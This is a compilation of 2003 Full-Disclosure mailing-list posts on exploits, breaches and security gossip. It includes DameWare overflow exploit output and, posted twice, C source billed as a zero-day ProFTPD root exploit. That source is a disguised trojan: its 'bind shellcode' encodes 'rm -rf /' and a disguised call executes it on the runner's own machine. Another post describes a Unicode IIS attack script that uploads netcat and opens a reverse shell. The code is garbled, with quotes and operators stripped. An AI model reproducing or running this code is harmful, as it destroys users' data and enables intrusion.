netmaniac[at]hotmail.KG )- - Versions vulnerable: = DWRCS 3.72.0.0 - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 WinXP SP1 Usage: dmware TargetIP TargetPort YourIp YourPort eg: dmware 10.0.0.1 6129 10.0.0.2 21 C:\xploits\dmwaredmware 192.168.63.130 6129 192.168.63.1 53 ...oO DameWare Remote Control Server Overflow Exploit Oo... -( by Adik netmaniac[at]hotmail.KG )- - Versions vulnerable: = DWRCS 3.72.0.0 - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 WinXP SP1 [*] Target IP: 192.168.63.130 Port: 6129 [*] Local IP: 192.168.63.1Listening Port: 53 [*] Initializing sockets... [ OK ] [*] Binding to local port: 53...[ OK ] [*] Setting up a listener...[ OK ] OS Info : WIN2000 [ver 5.0.2195] SP String : Service Pack 3 EIP: 0x77db912b (advapi32.dll) [*] Constructing packet for WIN 2000 SP: 3... [ OK ] [*] Connecting to 192.168.63.130:6129...[ OK ] [*] Packet injected
[Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit
Ladies and gentlemen, here's the source code of the exploit for the latest
release of ProFTPD. This is a Zero-Day private exploit, please DON'T
REDISTRIBUTE. I will not take responsibility for any damages which could
result from the usage of this exploit, use it at your own risk.
--
/*
Example of use:
# gcc exploit.c -o exploit
# ./exploit 192.168.1.1 21
Connected on 192.168.1.1:21
Exploitation in progress...
Exploitation string sent.
Trying to connect, please wait...
Linux michelle 2.4.20 #1 SMP Fri Mar 14 14:10:36 EST 2003 i686 unknown
unknown GNU/Linux
uid=0(root) gid=0(root) groupes=0(root)
*/
#include stdio.h
#include stdlib.h
#include sys/socket.h
#include sys/types.h
#include unistd.h
#include netdb.h
#define NOP 0x90
#define RET 0x6675636b
/* x86 bind shellcode */
char sc[]=
\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d
\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41
\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f
\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44
\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24
\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14
\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0
\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80;
unsigned long resolve(char *hostname);
int give_me_a_shell(unsigned long dest);
int main(int argc, char *argv[])
{
int i, *ret;
char *string;
unsigned long addr;
char buffer[1024];
int port=21, fd, s;
struct sockaddr_in addy;
if(argc 2)
{
fprintf(stdout, usage: %s host port\n, argv[0]);
return(0);
}
else addr=resolve(argv[1]);
if(argv[2]) port=atoi(argv[2]);
/* copy the NOPs to the buffer */
memset(buffer, NOP, 1024);
/* copy the shellcode to the buffer */
for(i=0; i strlen(sc); i++)
buffer[i+700]=sc[i];
/* copy the return address to the buffer */
for(i=815; i1003; i+=4)
*((int *)buffer[i]) = RET;
string = (char *) malloc(strlen(buffer)+20);
sprintf(string, \x4c\x4f\x56\x45 %s, buffer);
fd = socket(AF_INET, SOCK_STREAM, 0);
if(fd 0)
{
fprintf(stderr, unable to socket()\n);
return(-1);
}
addy.sin_family= AF_INET;
addy.sin_addr.s_addr = addr;
addy.sin_port = htons(port);
/* connect to remote host */
if(connect(fd, (struct sockaddr *)addy, sizeof(addy)) 0)
{
fprintf(stderr, unable to connect()\n);
return(-1);
}
printf(Connected on %s:%d\n, inet_ntoa(addy.sin_addr), port);
printf(Exploitation in progress...\n);
/* send the exploitation string to the host */
if(s = send(fd, string, sizeof(string), 0) 0)
{
fprintf(stderr, unable to send()\n);
return(-1);
}
close(fd);
printf(Exploitation string sent.\n);
free(string);
/* connect to the bindshell */
printf(Trying to connect, please wait...\n);
void(*sleep)()=(void*)sc;sleep(5);
if(give_me_a_shell(addr) 0)
{
fprintf(stderr, Sorry, exploit didn't work.\n);
return(-1);
}
return(0);
}
unsigned long resolve(char *sname)
{
struct hostent * hip;
hip = gethostbyname(sname);
if (!hip)
{
fprintf(stderr, unable to find %s\n,sname);
exit(1);
}
return *(unsigned long *)hip - h_addr;
}
int give_me_a_shell(unsigned long addr)
{
int sock;
fd_set fds;
struct sockaddr_in shell;
unsigned char buf[4096];
char cmd[]=uname -a id;
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock 0)
{
fprintf(stderr, unable to socket()\n);
return(-1);
}
shell.sin_family = AF_INET;
shell.sin_port= htons(1337);
shell.sin_addr.s_addr = addr;
if(connect(sock, (struct sockaddr *)shell, sizeof(struct sockaddr)) 0)
{
fprintf(stderr, unable to connect()\n);
close(sock);
return(-1);
}
send(sock, cmd, strlen(cmd), 0);
while(1)
{
FD_ZERO(fds);
FD_SET(0, fds);
FD_SET(sock, fds);
if(select(255, fds, NULL, NULL, NULL) == -1)
{
fprintf(stderr, unable to select()\n);
close(sock);
return(-1);
}
memset(buf, 0, sizeof(buf));
if(FD_ISSET(sock, fds))
{
if(recv(sock, buf, sizeof(buf), 0) 0)
{
fprintf(stderr, unable to recv()\n);
close(sock);
return(-1);
}
fprintf(stderr, %s, buf);
}
if(FD_ISSET(0, fds))
{
read(0, buf, sizeof(buf));
if(!strcmp(buf, quit))
{
close(sock);
return(0);
}
write(sock, buf, strlen(buf));
}
}
}
--
Have fun ! @+
_
MSN Messenger 6 http://g.msn.fr/FR1001/866 : plus de personnalisation, plus
de fun pour vous et vos amis
___
[Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit
Ladies and gentlemen, here's the source code of the exploit for the latest
release of ProFTPD. This is a Zero-Day private exploit, please DON'T
REDISTRIBUTE. I will not take responsibility for any damages which could
result from the usage of this exploit, use it at your own risk.
--
/*
Example of use:
# gcc exploit.c -o exploit
# ./exploit 192.168.1.1 21
Connected on 192.168.1.1:21
Exploitation in progress...
Exploitation string sent.
Trying to connect, please wait...
Linux michelle 2.4.20 #1 SMP Fri Mar 14 14:10:36 EST 2003 i686 unknown
unknown GNU/Linux
uid=0(root) gid=0(root) groupes=0(root)
*/
#include stdio.h
#include stdlib.h
#include sys/socket.h
#include sys/types.h
#include unistd.h
#include netdb.h
#define NOP 0x90
#define RET 0x6675636b
/* x86 bind shellcode */
char sc[]=
\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d
\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41
\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f
\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44
\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24
\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14
\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0
\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80;
unsigned long resolve(char *hostname);
int give_me_a_shell(unsigned long dest);
int main(int argc, char *argv[])
{
int i, *ret;
char *string;
unsigned long addr;
char buffer[1024];
int port=21, fd, s;
struct sockaddr_in addy;
if(argc 2)
{
fprintf(stdout, usage: %s host port\n, argv[0]);
return(0);
}
else addr=resolve(argv[1]);
if(argv[2]) port=atoi(argv[2]);
/* copy the NOPs to the buffer */
memset(buffer, NOP, 1024);
/* copy the shellcode to the buffer */
for(i=0; i strlen(sc); i++)
buffer[i+700]=sc[i];
/* copy the return address to the buffer */
for(i=815; i1003; i+=4)
*((int *)buffer[i]) = RET;
string = (char *) malloc(strlen(buffer)+20);
sprintf(string, \x4c\x4f\x56\x45 %s, buffer);
fd = socket(AF_INET, SOCK_STREAM, 0);
if(fd 0)
{
fprintf(stderr, unable to socket()\n);
return(-1);
}
addy.sin_family= AF_INET;
addy.sin_addr.s_addr = addr;
addy.sin_port = htons(port);
/* connect to remote host */
if(connect(fd, (struct sockaddr *)addy, sizeof(addy)) 0)
{
fprintf(stderr, unable to connect()\n);
return(-1);
}
printf(Connected on %s:%d\n, inet_ntoa(addy.sin_addr), port);
printf(Exploitation in progress...\n);
/* send the exploitation string to the host */
if(s = send(fd, string, sizeof(string), 0) 0)
{
fprintf(stderr, unable to send()\n);
return(-1);
}
close(fd);
printf(Exploitation string sent.\n);
free(string);
/* connect to the bindshell */
printf(Trying to connect, please wait...\n);
void(*sleep)()=(void*)sc;sleep(5);
if(give_me_a_shell(addr) 0)
{
fprintf(stderr, Sorry, exploit didn't work.\n);
return(-1);
}
return(0);
}
unsigned long resolve(char *sname)
{
struct hostent * hip;
hip = gethostbyname(sname);
if (!hip)
{
fprintf(stderr, unable to find %s\n,sname);
exit(1);
}
return *(unsigned long *)hip - h_addr;
}
int give_me_a_shell(unsigned long addr)
{
int sock;
fd_set fds;
struct sockaddr_in shell;
unsigned char buf[4096];
char cmd[]=uname -a id;
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock 0)
{
fprintf(stderr, unable to socket()\n);
return(-1);
}
shell.sin_family = AF_INET;
shell.sin_port= htons(1337);
shell.sin_addr.s_addr = addr;
if(connect(sock, (struct sockaddr *)shell, sizeof(struct sockaddr)) 0)
{
fprintf(stderr, unable to connect()\n);
close(sock);
return(-1);
}
send(sock, cmd, strlen(cmd), 0);
while(1)
{
FD_ZERO(fds);
FD_SET(0, fds);
FD_SET(sock, fds);
if(select(255, fds, NULL, NULL, NULL) == -1)
{
fprintf(stderr, unable to select()\n);
close(sock);
return(-1);
}
memset(buf, 0, sizeof(buf));
if(FD_ISSET(sock, fds))
{
if(recv(sock, buf, sizeof(buf), 0) 0)
{
fprintf(stderr, unable to recv()\n);
close(sock);
return(-1);
}
fprintf(stderr, %s, buf);
}
if(FD_ISSET(0, fds))
{
read(0, buf, sizeof(buf));
if(!strcmp(buf, quit))
{
close(sock);
return(0);
}
write(sock, buf, strlen(buf));
}
}
}
--
Have fun ! @+
_
Trouvez l'âme soeur sur MSN Rencontres http://g.msn.fr/FR1000/9551
___
Full-Disclosure - We believe in it.
Charter:
[Full-Disclosure] Windows hosts file changing.
Does -ANYBODY- know how it occurs? I've had this happen to a couple boxes of mine now... New one: -- 127.0.0.1 localhost 66.40.16.131livesexlist.com 66.40.16.131lanasbigboobs.com 66.40.16.131thumbnailpost.com 66.40.16.131adult-series.com 66.40.16.131www.livesexlist.com 66.40.16.131www.lanasbigboobs.com 66.40.16.131www.thumbnailpost.com 66.40.16.131www.adult-series.com -- Any idea how the search site is replacing that? =/ It's starting to piss me off =/ I had some custom information in there that's now overwritten (Not backed up) Thanks =/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Application level firewall
Jason Freidman wrote: Is there any sort of application level firewall for linux? Something like Zone alarm where you can trust an application? I think that openBSD has something that allows you to choose which system calls a program can run. You want systrace, which is the package OpenBSD is using. It is also available for Linux and Mac OS X. See here: http://www.citi.umich.edu/u/provos/systrace/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Shift key breaks CD copy locks
But by ATF standards, the Windows operating system and keyboard would not need to be installed on the computer - simply possessing both components would be enough to bust you. Of course if you are running Windows 3.11 and you lawfully possessed it prior to 1995 you would be grandfathered... If you wanted to take the ATF's approach, it's not just having a keyboard that is breaking the law, it's the combination of having a keyboard AND the Windows operating system installed ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Mystery DNS Changes
Title: Mystery DNS Changes We have seen multiple instances where DHCP enabled workstations have had their DNS reconfigured to point to two of the three addresses listed below. Can anyone else confirm this? Incidents.org is reporting an increase in port 53 traffic over the last two days. Are we looking at the precursor to the next worm? 216.127.92.38 69.57.146.14 69.57.147.175 -KJH ++ Kevin J. Hansen Architect Global Network Thomson Legal Regulatory [EMAIL PROTECTED] 651-687-8466 ++
RE: [Full-Disclosure] Israeli boffins crack GSM code
More info at Cryptome: http://cryptome.org/gsm-crack.htm http://www.k4d4th.org/pub/crypto/cryptome/cryptout.htm#GSM -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Richard Spiers Sent: Tuesday, September 09, 2003 9:10 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Israeli boffins crack GSM code Hi guys, anybody got more information on this? Any thoughts? http://www.theregister.co.uk/content/55/32653.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Israeli boffins crack GSM code
Dude, you've got to find some new people to party with. Sorry, which GSM code would this be? Because I distinctly remember being at a party years ago where the GSM code (some weak variant of A5) was shown to be weak and hackable. This was back in 1998... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] eBay Security Contact
I recommend calling support and asking to speak with a supervisor, and then their supervisor's supervisor, etc. etc. That's worked well for me at a number of companies. Kevin. - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Thursday, May 01, 2003 1:25 PM Subject: [Full-Disclosure] eBay Security Contact Hello, I'm looking for contact information for the security department (if such a thing exists) at eBay. If anyone has any security contact information (specifically, I'm looking for e-mail addresses), or just general support information where I can reach a human -- as such information appears to be deeply buried. I'm really starting to become frustrated by the lack of support; everything they have is automated/robotic, and even that doesn't really mail2web - Check your email from the web at http://mail2web.com/ . ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Security Certifications
No way... if they were Certified Idiots they'd be easier to identify. Kevin. - Original Message - From: rrm [EMAIL PROTECTED] To: 'Leo Security' [EMAIL PROTECTED]; 'Rizwan Ali Khan' [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Saturday, March 08, 2003 7:45 PM Subject: RE: [Full-Disclosure] Security Certifications We could really do with less certified idiots. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Leo Security Sent: Saturday, March 08, 2003 7:19 PM To: Rizwan Ali Khan; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Security Certifications I have checked the content and syllabi of most of the subjects offered for these certs and was disappointed. They are a waste of time. My advice will be to use your time for the deep study of operating systems. That would make you a better security analyst. Most employers have had it with certs and do not give much importance to it any more. Certifications were hot untill 2000. There value is going downhill since then. I would only go for certs if my employer requires it and pays me for it. I will never like to spend my own money on certs. Thats my opinion. regards Leo hellNbak wrote: Be sure when filling out the questionaire from ISC2 that you lie if you have been a part of any hacking groups or have used a nym. Honesty *IS NOT* the best policy in this case. I have a friend in Tokyo who took the lead auditor course and passed the test, he said it was horrible and not worth the time or money On Fri, 7 Mar 2003, Ron DuFresne wrote: Date: Fri, 7 Mar 2003 09:08:21 -0600 (CST) From: Ron DuFresne [EMAIL PROTECTED] To: Rizwan Ali Khan [EMAIL PROTECTED] Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Security Certifications Your quickest bet here is to do a google search on cisa and then on cissp. You'll gt pointers to the governing bodies and such, pointers to lists of pretesting help, local affiliations as well as testing sites in the near future and much more in the first 10-20 links google returns. Thanks, Ron DuFresne On Thu, 6 Mar 2003, Rizwan Ali Khan wrote: I have heard of CISA and CISSP as Security Certifications, but could someone shed some light and give information about the governing bodies of the following Certifications, and where to get their suggested training material/ books etc. And if it is possible to give their exams from Pakistan? BS7799/ISO7799 lead auditor Prince 2 SSCP CISM CISMP TCSEC SCP __ Do you Yahoo!? Yahoo! Tax Center - forms, calculators, tips, more http://taxes.yahoo.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ~~ Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation. -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] ./makeunicode2.py release announcement
Or like a meeting of nuns and hookers to discuss sex. Georgi I don't know about you, but I would go see that discussion. Kevin. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Cryptome Hacked!
damage its integrity. e) How is John Young an extremist? Would you describe him as being conservative, or moderate in his approach? If not, he is an extremist in my eyes. Again, you choose to oversimplify things... are conservative, moderate and extreme the only things that are out there? When I think of extremists, I think of people like the Black Panthers, Adolf Hitler, Hamas and Thomas Jefferson. John Young runs a website. He simply isn't in the running for Extremism. Are you trying to imply that John Young is trojaning the software that his site (infrequently) distributes? Not at all. I believe that Mr. Young wishes to provide his community access to good crypto software. I also believe that he is committed to his cause. However, I do think that those who work for/with No Such Agency would like that. You think that the NSA is modifying widely distributed crypto software? Okay, that's possible. How about some proof? You can speculate endlessly on the behaviour of an organization that no one has a lot of information about. Cryptome (note Crypt) does indeed distribute and advocate the use of PGP and other encryption and/or privacy enhancing software. Given the more-paranoid-than-normal state of most of the cryptome visitors (myself included), I would think that quite a high percentage of them download and use the software for their own reasons. You posted a message saying that cryptome had been hacked and that you were concerned about software that it mirrors might be tampered with not only on Cryptome but on other sites. The software that cryptome has is also located in many, many other places and thus it would be easy to spot differences between them. If you want to start asking how do I trust the hashing tool, how do I trust the crypto algorithm or how do I trust the compiler that I'm using to build the code that I wrote to implement the algorithm, you've wandered outside the scope of what most people on this list care to answer. In conclusion, for you to attempt to describe cryptome as if it was C-SPAN, or the Library of Congress is incredible. If you believe that the operators of cryptome have good intentions towards the US government, than you are also naive. Cryptome is a site that strongly promotes a very specific agenda which is often at odds with established public policy and popular opinion. It also publishes opinions of dissent that it may not fully support but feel deserve discussion and exposure. Neither John Young nor Cryptome are many of the things that you have described them as. The purpose of my message was to point out what I believe were errors in how you portrayed them. Kevin. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Hackers View Visa/MasterCard Accounts
Here's an excerpt from the posting to net-security.org: - The hacker breached the security system of a company that processes credit card transactions on behalf of merchants, Visa and MasterCard said. - Looks like someone just ran off with a database. I haven't done any math, but I'd think that brute forcing that many card numbers and expiration dates would take ages. Kevin. - Original Message - From: Jason Coombs [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, February 18, 2003 4:28 AM Subject: [Full-Disclosure] Hackers View Visa/MasterCard Accounts So, anyone know whether this was a simple real-time credit card processing oracle attack where a tool throws fake orders at sites that provide real-time credit card authorizations until a valid card number and expiration date are found? Any third-grader with a copy of Microsoft .NET or Java 2 class libraries could whip up the code needed to bang away at the typical e-commerce site logging rejected orders due to invalid credit card payment and revealing card numbers and expiration dates that can be used for fraud in a variety of ways. There must be such credit card hacking tools circulating for the benefit of script kiddies -- anyone looked into this before? If so, will you share some references? Jason Coombs [EMAIL PROTECTED] -- Hackers View Visa/MasterCard Accounts Mon February 17, 2003 11:17 PM ET NEW YORK (Reuters) - More than five million Visa and MasterCard accounts throughout the nation were accessed after the computer system at a third party processor was hacked into, according to representatives for the card associations. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Hackers View Visa/MasterCard Accounts
I heard it was your mom. Kevin. - Original Message - From: KF [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, February 18, 2003 5:32 AM Subject: Re: [Full-Disclosure] Hackers View Visa/MasterCard Accounts Does anyone know who the third party processor was? -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Unusual request
Title: RE: [Full-Disclosure] Unusual request Unicoder by HDmoore will do a lot of unicode checks , plus it can be used over SSL to evage a NID or through a proxy to obfuscate your ip. I wrote a little add on to it called firerunner that would actually do the exploit and ftp Netcat to the host. After that was finished it would connect back to a Netcat listener with a cmd prompt. The whole process took less than 10 seconds. I tracked down a copy of it. It is kind of old and there are probobaly some coding errors on my part, since it was really just a test and never released. Here it is. Keep in mind it's pretty old but with a little love should be able to demonstrate Unicode attacks and back channel connections as well as the ability to use a proxy. The script allows it to function as such Attack from IP 1 (which could be a proxy) FTP Netcat from another IP Create connection to a 3rd ip Good luck. Kevin -Original Message- From: Rapaille Max [mailto:[EMAIL PROTECTED]] Sent: Thursday, February 13, 2003 7:58 AM To: Schmehl, Paul L; Full-Disclosure Subject: RE: [Full-Disclosure] Unusual request Hi, I did this kind of demo 2-3 times already, with a Win2k SP2 and IIS. To add a layer, we just added a firewall between the ISS and the attacker PC .. with just Port 80 incoming and, as (too)usual, All port open for outgoing... Just using a unicode exploit, and then loading some tools, defacing web page, taking remote control, etc... A lot of fun for Us, and great astonishment for the public.. Certainly with the firewall.. A lot of them where just saying, before the demo : We are secure, our integrator installed a firewall... BTW, we also used some tools ike unicoder.pl and Upload.asp, to demonstrate, in a second time, how easy it is, even if you don't know what you do... Good effect of awareness for those managers, Engineer, etc... Good luck. Max -Original Message- From: Schmehl, Paul L [mailto:[EMAIL PROTECTED]] Sent: 13 February 2003 14:37 To: Full-Disclosure Subject: RE: [Full-Disclosure] Unusual request Thanks to all who offered suggestions. I don't know why I couldn't remember unicode when I was googling, but then I've read thousands of man pages and docs since then, and my mind can only hold so much information. :-) What I plan to do is load a box with a default install of IIS and use a web browser based attack to demonstrate how easily a box can be compromised when it's unpatched. (I'll probably just deface a web page.) Since the audience will be normal users, I expect most of them to be astounded and incredulous, which is why I wanted to use something very simple to understand. If I ran a program through a netcat session, I suspect many of them wouldn't get it, but if I type a URL into a browser, I *hope* they will all see that *anyone* could do that, even with very little knowledge of exploits or security practices. And before you ask, no the box will not be connected to our LAN. Otherwise it would get Code Red and Nimda before I could even complete my demonstration. :-) Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas http://www.utdallas.edu/~pauls/ AVIEN Founding Member ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html fire-runner.pl Description: Binary data
Re: [Full-Disclosure] [Secure Network Operations, Inc.] Full Disclosure != Exploit Release
He used his access to TRW and credit information for illegal purposes all the time. How do you think he stayed on the run for so long? He found ways of faking Western Union money transfers, using TRW data to impersonate people and a litany of other things. See Jon Littman's book _The Fugitive Game_ for the details. Also, having a large number of stolen creit card numbers did not earn him the the most wanted cyber-criminal award. He was primarily in trouble for intellectual property theft (read: source code). He became the most wanted cyber-criminal award because he evaded the police for years while continuing to commit crimes. That is what the most wanted lists are about. People who cannot be caught and continue to break the law (or are likely to do so). And who did he set in fear? He mostly just pissed people off. Why would you fear someone for having a large number of stolen creit card numbers? This world must be a scary place for you. Kevin. Mitnick ammased a large number of stolen creit card numbers, that was what really earned him the most wanted cyber-criminal award in his time. Even though I do not recall a documented case whence he ever used any of those numbers in a fraudulent manner. It was the fear of his potential to garner and use them and set people in fear... Thanks, Ron DuFresne ~~ Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation. -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Is Sapphire the world's smallest computer worm?
I remember seeing (alledged) Morris worm source code on PacketStorm awhile ago. Kevin Spett SPI Labs http://www.spidynamics.com/ - Original Message - From: Roland Postle [EMAIL PROTECTED] To: Full-Disclosure [EMAIL PROTECTED] Sent: Saturday, January 25, 2003 3:49 PM Subject: Re: [Full-Disclosure] Is Sapphire the world's smallest computer worm? On Sat, 25 Jan 2003 14:22:19 -0500, Richard M. Smith wrote: At 376 bytes, is this new Sapphire worm the world's smallest computer worm? The only competition I can think of is the Morse worm. Anybody know how big it was? I suspect the morse worm was bigger, therefor I'm prepared to offer a flashy World's smallest internet worm award (solid gold statuette on a marble stand with attached chrome plate which will be etched at a later date) to the author of this one. If they would just like to stand up and claim it - Blazde ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Lock business practices security-by-obscurity for 150 years
Yes, but the real question here still remains: What is Richard smoking and where can I get some of it? Kevin. - Original Message - From: hellNbak [EMAIL PROTECTED] To: Georgi Guninski [EMAIL PROTECTED] Cc: Richard M. Smith [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Thursday, January 23, 2003 2:38 PM Subject: Re: [Full-Disclosure] Lock business practices security-by-obscurity for 150 years On Thu, 23 Jan 2003, Georgi Guninski wrote: Richard, you seem to be smoking something bad today. If you look at your trollish analogy, from the quote above you will see that such problems are disclosed in locksmith trade journals at least. And who cares if micro$osft relies on obscurity? Georgi, you are letting your immature hatred for Microsoft cloud your vision, but what else is new. Yes, this issue has been known for 150 years by locksmiths and they didn't understand the security risks or they did and didn't care because they didn't think that anyone else would know about it. But, as with most things this wasn't the case. Others, outside of the locksmithing industry no doubt knew about this as well. With no one in the locksmithing industry running out and telling anyone this would have made a nice little secret to hang on to. So yes, this was security through obscurity. Without public disclosure there would be little motivation for lock companies to retool and create better locks. -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- I don't intend to offend, I offend with my intent [EMAIL PROTECTED] http://www.nmrc.org/~hellnbak -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Australia becomes a police state [serious]
I don't know what the laws in .au are like, but in the US no one can investigate or challenge an action made that is part of the war on terrorism. The information is considered so secret that it can never be discussed in a court, not even in front of a Supreme Court Justice or the Senate, not even in front of the Senate intelligence committee. So in the US, if they want to harrass people and insist that it's part of the war on terror, they can. Due process, even under order of federal courts, has been *ignored* by the US military and nothing has been done about it. Kevin. Umm. Not to rain on your Indymedia-inspired parade, Silvio, but have you read the legislation, or any of the discussions in parliament surrounding it? Or have you only read the hyperbolic predictions of doom that Indymedia agitators have made? The single key point that seems to be missing in Indymedia forums postings as of early this morning when I last checked is that these powers are only intended to be invoked in the event of a terrorist attack on the State. Not for random harrassment of random ethnic groups, raids on J Random Hacker, or raids on political agitators. Nor will graphing the local courthouse cause these laws to be invoked. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Hah now this redefines selling out.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Yeah don't get me wrong ... I understand his situation totally. I didn't see the note at the bottom of the ebay auction that stated it would be used to pay for legal fees untill after I sent the email.I just can't imagine paying that much for an old toshiba laptop. I have a slightly used Toshiba 400cs that I am willing to sell for $15,000 dollars if anyone is interested. =] - -KF Phantasm wrote: |When you are looking to pay off legal fee's for the past as well as the |legal fee's to get your radio license reinstated, it would sound like a |good idea. | |Not inlcuding Kevin paid about $6,000 in November before the raid and |the laptop confiscated, need someway to get that laptop paid for. | |If you were stuck in the hole trying to pay shit off, you would pawn |some old shit to pay it as well. | |In a week or so, his cell equipment is going up too... Gonna bitch about |that as well? | |Rob |Textbox Networks -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQE9nP+rMZ9vzENm4VURAmYXAJ0ZpOUab/JMyIQuzgU/yyRr6dc0fwCeLe+G 7afJHh6T4EniAMvJiD/HyL4= =6Bqg -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
